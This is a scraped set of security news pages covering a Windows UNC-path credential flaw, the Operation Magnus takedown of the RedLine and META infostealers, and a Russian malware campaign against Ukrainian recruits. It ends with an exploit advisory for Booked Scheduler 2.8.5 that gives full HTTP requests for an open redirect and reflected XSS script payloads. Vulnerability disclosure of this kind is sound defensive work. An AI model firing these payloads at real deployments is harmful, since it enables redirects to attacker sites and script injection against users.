Akamai's Peled says it's hard to know what ACROS's vulnerability is about without having access to the technical details. "But it might be another UNC bypass that circumvents the check, or it could be a different key,value pair that was missed in the original patching," he says. "UNC path formats are very complex and allow for weird combinations, which make detecting them very hard. This might be why it's so complex to fix."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Recurring Windows Flaw Could Expose User Credentials

An international law enforcement operation, led by the United States, Europol, and the Netherlands, has successfully dismantled the…

An international law enforcement operation, led by the United States, Europol, and the Netherlands, has successfully dismantled the infrastructure behind the notorious RedLine and META infostealer malware. Discover how these cyberattacks steal sensitive information and the impact they have on individuals and businesses worldwide.

An international law enforcement operation has successfully dismantled the infrastructure behind two notorious infostealer malware strains: RedLine and Meta. The operation, codenamed “Operation Magnus,” was led by the Dutch National Police, the U.S. Department of Justice (DOJ) and supported by Europol.

The investigation involved law enforcement agencies from across the globe, including Belgium (Belgian Federal Police, Belgian Federal Prosecutor’s Office), Australia (the Australian Federal Police), Portugal (Polícia Judiciária), and the United Kingdom (National Crime Agency).

Other US agencies involved in this operation include the FBI, Naval Criminal Investigative Service, IRS Criminal Investigation, Defense Criminal Investigative Service, and Army Criminal Investigation Division. These agencies collaborated under a Joint Cybercrime Action Taskforce (“JCAT”) Operation Magnus. 

Watch the video released by authorities

This operation resulted in full access (PDF) to the servers hosting the malware’s infrastructure, including source code, license servers, user data, and seizing domains and Telegram accounts. Authorities have created a dedicated website to provide resources for victims and the public

For your information, Infostealers are a type of malware designed to steal sensitive information from victims’ devices, such as login credentials, passwords, and credit card details. These stolen credentials are often sold on underground markets, enabling further cyberattacks and fraudulent activities.

Screenshot from RedLine’s infrastructure

RedLine and META are designed to infiltrate victim computers and steal sensitive information. This stolen data, often referred to as “logs,” can include usernames, passwords, financial information, and even cryptocurrency wallet details. Criminals use these stolen credentials for a variety of nefarious purposes, including launching further attacks, committing fraud, or bypassing multi-factor authentication (MFA). 

Investigations revealed RedLine and META may have infected millions of computers worldwide. Estimates suggest RedLine alone might be one of the most prevalent malware variants globally. Law enforcement has identified millions of unique credentials stolen by the malware, including usernames, passwords, and financial data.

As part of Operation Magnus, authorities unsealed a criminal complaint (PDF) against Maxim Rudometov, believed to be a developer and administrator of RedLine. The complaint accuses Rudometov of managing RedLine’s infrastructure, receiving payments through cryptocurrency accounts, and possessing the malware itself. He faces charges including access device fraud, conspiracy to commit computer intrusion, and money laundering, and if convicted, he could face a maximum sentence of 10 years in prison.

Maxim Rudometov, the alleged developer and administrator of RedLine.

Operation Magnus serves as a powerful example of international cooperation in combating cybercrime. By dismantling the RedLine and META infrastructure, law enforcement has significantly disrupted the activities of cybercriminals who rely on stolen data for their illicit operations. However, the ever-evolving nature of cybercrime necessitates continued vigilance and cooperation between law enforcement and cybersecurity experts.

1.  **VirusTotal Reveals Apps Most Exploited To Spread Malware**
2.  **Konni RAT Exploiting Word Docs to Steal Data from Windows**
3.  **FBI Dismantles Chinese-Linked Botnet of 260,000 IoT Devices**
4.  **Police Dismantle Phishing-as-a-Service Platform BulletProftLink**
5.  **Arid Viper’s AridSpy Trojan Hits Android Users in Palestine, Egypt**

Operation Magnus: Police Dismantles RedLine and META Infostealer Infrastructure

Russian hackers launched a targeted malware campaign via Telegram, aimed at Ukrainian military recruits. Disguised as recruitment tools,…

Russian hackers launched a targeted malware campaign via Telegram, aimed at Ukrainian military recruits. Disguised as recruitment tools, the malware steals data and spreads disinformation, weakening Ukraine’s defence efforts.

A new report by Google’s Threat Intelligence Group (TAG) exposes a cyber campaign targeting Ukrainian men eligible for military service. The campaign, linked to Russian state-sponsored hackers, orchestrated by the UNC5812 group, utilizes a combination of malware and disinformation.

It is worth noting that at the beginning of October 2024, reports indicated that Russian cyber operations against Ukraine during the first half of the year shifted from broad-spectrum attacks to a more targeted approach, specifically focusing on Ukraine’s military and defence sectors.

For the latest campaign, the immediate objective is to compromise the devices of potential Ukrainian military recruits. Hackers are distributing malicious software to help Ukrainian military recruits locate recruitment centers. These programs are laced with malware that can steal sensitive information like browser data, keystrokes, and cryptocurrency wallet details. 

To achieve this, the attackers have established a deceptive online presence through a Telegram channel and website known as “Civil Defense.” Reportedly, the website was registered in April 2024, but the Telegram channel was created in September

These platforms entice users with promises of helpful information and tools related to military conscription. However, once victims download and install the offered software, they unwittingly expose their devices to various malware strains.

For Windows users, this typically involves the Pronsis Loader, which subsequently delivers the information-stealing PURESTEALER. Android users, on the other hand, are targeted with the CRAXSRAT backdoor, a versatile tool capable of data theft, surveillance, and remote control. 

To bypass security measures, the attackers have employed social engineering techniques, instructing victims to disable Google Play Protect and manually grant permissions to the malicious apps. The campaign also involves a concerted effort to spread disinformation and undermine public morale in Ukraine. 

The “Civil Defense” platform disseminates anti-mobilization narratives, promotes false information about the war, and encourages users to share videos of alleged unfair practices at recruitment centers. The website has a dedicated news section rife with fabricated stories depicting purported injustices surrounding mobilization. The content is posted on pro-Russian social media channels. 

The UNC5812 campaign is part of a broader pattern of Russian cyberattacks aimed at destabilizing Ukraine. By targeting potential recruits, the attackers seek to erode public support for the military and hinder Ukraine’s ability to defend itself. 

Researchers suspect that UNC5812 is purchasing promoted posts in Ukrainian-language channels to target potential victims. A channel with over 80,000 subscribers promoting the “Civil Defense” Telegram channel-website was observed on September 18th. An additional Ukrainian-language news channel promoting the posts as recently as October 8th suggests the campaign is actively seeking new Ukrainian-language communities for targeted engagement.

Civil Defense promoted in Ukrainian-language missile alert and news communities and Download page, translated from Ukrainian (Via Google)

Google has identified and blocked malicious websites and domains by adding them to Safe Browsing, actively scanning devices for harmful apps, and collaborating with Ukrainian authorities to block the campaign’s website within the country. Google Play Protect also actively scans devices for harmful apps, including those installed outside the Play Store.

Nevertheless, Google’s report sheds light on Russia’s multifaceted approach to weakening Ukraine’s war effort through cyber means. By staying informed and utilizing security measures provided by platforms like Google, users can help mitigate the impact of such campaigns.

1.  Russia Responsible for Widespread Power Outage in Ukraine?
2.  Ukraine Blocks Russian Industroyer 2 Attack on Energy Provider
3.  Hackers Claim Data Breach at Russian Cybersecurity Firm Dr.Web
4.  Russian APT29 Using NSO Group-Style Exploits in Attacks, Google
5.  Russian Midnight Blizzard Breached UK Home Office via Microsoft

Russian Malware Attack Targets Ukrainian Military Recruits via Telegram

Booked Scheduler version 2.8.5 suffers from cross site scripting and open redirection vulnerabilities.

    # Exploit Title: Open Redirect / Reflected XSS - booked-schedulerv2.8.5# Date: 10/2024# Exploit Author: Andrey Stoykov# Version: 2.8.5# Tested on: Ubuntu 22.04# Blog:https://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-13-reflected.htmlhttps://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-12-open.htmlOpen Redirect:Steps to Reproduce:1. Login and intercept HTTP request with a proxy such as Burpsuite or ZAP2. In the "resume" parameter add the redirect URL e.g. Burp Collab3. Forward the requestindex.php// HTTP POST login requestPOST /Bookedbo8effotfu/Web/index.php HTTP/1.1Host: localhostCookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yesUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0[...]email=admin&password=password&captcha=&login=submit&resume=https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg// HTTP responseHTTP/1.1 302 FoundDate: Sat, 12 Oct 2024 12:09:33 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheLocation: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.comContent-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8Reflected XSS:reservation.php// HTTP GET requestGET/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>HTTP/1.1Host: localhostCookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;new_version=v%3D2.8.5%2Cfs%3D1728734988;fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yesUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflate, brDnt: 1Sec-Gpc: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Priority: u=0, iTe: trailersConnection: keep-alive// HTTP responseHTTP/1.1 200 OKDate: Sat, 12 Oct 2024 12:23:55 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 14003<h5><ahref="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Returnto the last page that you were on</a></h5></div>schedule.php// HTTP GET requestGET/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>HTTP/1.1Host: localhostCookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb;resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D;schedule_calendar_toggle=falseUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflate, brUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Priority: u=0, iTe: trailersConnection: keep-alive// HTTP responseHTTP/1.1 200 OKDate: Sat, 19 Oct 2024 09:12:33 GMTServer: ApacheExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 7853<h5><ahref="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Returnto the last page that you were on

Tag

#windows